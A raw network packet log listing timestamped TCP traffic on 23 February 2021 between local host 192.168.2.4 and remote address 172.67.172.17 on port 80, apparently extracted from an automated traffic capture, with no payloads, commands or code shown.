Feb 23, 2021 15:31:26.370599031 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.370630980 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.370646000 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.370651960 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.370670080 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.370707989 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.370744944 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.370780945 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.370796919 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.370805979 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.370820999 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.370857000 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.370932102 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.370970964 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.370995045 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.371004105 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.371032953 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.371093035 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.371153116 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.371191978 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.371208906 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.371213913 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.371246099 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.371300936 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.371356010 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.371395111 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.371412992 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.371421099 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.371454000 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.371512890 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.371551037 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.371603966 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.371611118 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.371612072 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.371651888 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.371707916 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.371750116 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.371807098 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.371817112 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.371817112 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.371855974 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.371911049 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.371948957 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.372011900 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.372019053 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.372021914 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.372059107 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.372112036 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.372283936 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.372324944 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.372356892 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.372364998 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.372384071 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.372437000 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.372478008 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.372529984 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.372534037 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.372534037 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.372571945 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.372632027 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.372678041 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.372714043 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.372734070 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.372741938 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.372747898 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.372782946 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.372824907 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.372859001 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.372869968 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.372875929 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.372895956 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.372972012 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.373243093 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.373281956 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.373321056 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.373357058 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.373414993 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.373444080 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.373454094 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.373460054 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.373495102 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.373532057 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.373572111 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.373585939 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.373590946 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.373609066 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.373642921 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.373680115 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.373714924 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.373749018 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.373785019 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.373814106 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.373819113 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.374141932 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.374180079 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.374217033 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.374253988 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.374264956 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.374273062 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.374289036 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.374324083 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.374360085 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.374393940 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.374417067 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.374423027 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.374428988 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.374464989 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.374501944 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.374538898 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.374548912 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.374553919 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.374572992 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.374608040 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.374643087 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.374691963 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.374699116 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.375092030 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.375132084 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.375168085 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.375204086 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.375240088 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.375253916 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.375267982 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.375274897 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.375313044 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.375349045 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.375386000 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.375394106 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.375397921 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.375423908 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.375463009 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.375498056 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.375531912 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.375536919 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.375541925 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.375566006 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.375605106 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.375849962 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.376138926 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.376172066 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.376197100 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.376221895 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.376230001 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.376247883 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.376272917 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.376296043 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.376310110 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.376313925 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.376318932 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.376491070 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.376511097 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.376570940 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.376591921 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.376596928 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.376621008 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.376643896 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.376667023 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.376688004 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.376692057 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.376692057 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.376715899 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.376738071 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.376750946 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.376774073 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.376838923 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.377116919 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.377142906 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.377167940 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.377191067 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.377192974 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.377213001 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.377221107 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.377244949 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.377268076 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.377290964 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.377310991 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.377314091 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.377315998 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.377337933 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.377362013 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.377399921 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.377412081 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.377423048 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.377429008 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.377444983 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.377470016 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.377470970 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.377767086 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.378024101 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.378051043 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.378067970 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.378087044 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.378112078 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.378138065 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.378161907 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.378190994 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.378201962 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.378210068 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.378211021 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.378232956 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.378257036 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.378264904 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.378268957 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.378274918 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.378292084 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.378314018 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.378336906 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.378362894 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.378369093 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.378967047 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.378999949 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.379034042 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.379059076 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.379070997 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.379082918 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.379087925 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.379110098 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.379136086 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.379153013 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.379170895 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.379193068 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.379194021 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.379196882 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.379223108 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.379245996 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.379264116 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.379268885 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.379270077 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.379290104 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.379316092 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.379354954 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.379359007 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.379916906 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.379960060 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.379987955 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.380012989 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.380037069 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.380053997 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.380059004 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.380067110 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.380083084 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.380111933 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.380136013 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.380152941 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.380158901 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.380158901 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.380177975 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.380203009 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.380224943 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.380239964 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.380240917 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.380244970 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.380259991 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.380795956 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.380825996 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.380846024 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.380868912 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.380878925 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.380887032 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.380906105 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.380930901 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.380961895 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.380965948 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.380966902 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.380991936 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.381006002 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.381016970 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.381043911 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.381067991 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.381092072 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.381114960 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.381115913 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.381120920 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.381139040 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.381158113 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.381217957 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.381221056 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.381747961 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.381778955 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.381802082 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.381825924 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.381886959 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.381892920 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.381901026 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.381915092 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.381932020 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.381954908 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.381989002 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.382004023 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.382008076 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.382014036 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.382040977 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.382065058 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.382090092 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.382102013 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.382106066 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.382114887 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.382138014 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.382163048 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.382667065 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.382689953 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.382713079 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.382812977 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.382821083 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.382822990 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.382848024 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.382872105 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.382915974 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.382942915 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.382955074 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.382961035 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.382966995 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.383002996 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.383028030 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.383053064 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.383079052 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.383090019 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.383094072 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.383106947 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.383126020 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.383131981 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.383152008 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.383172989 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.383174896 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.383192062 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.383311987 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.383752108 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.383780956 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.383799076 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.383822918 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.383846045 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.383867979 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.383897066 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.383922100 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.383948088 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.383974075 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.383985996 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.383991957 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.383997917 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.384027958 CET	80	49755	172.67.172.17	192.168.2.4
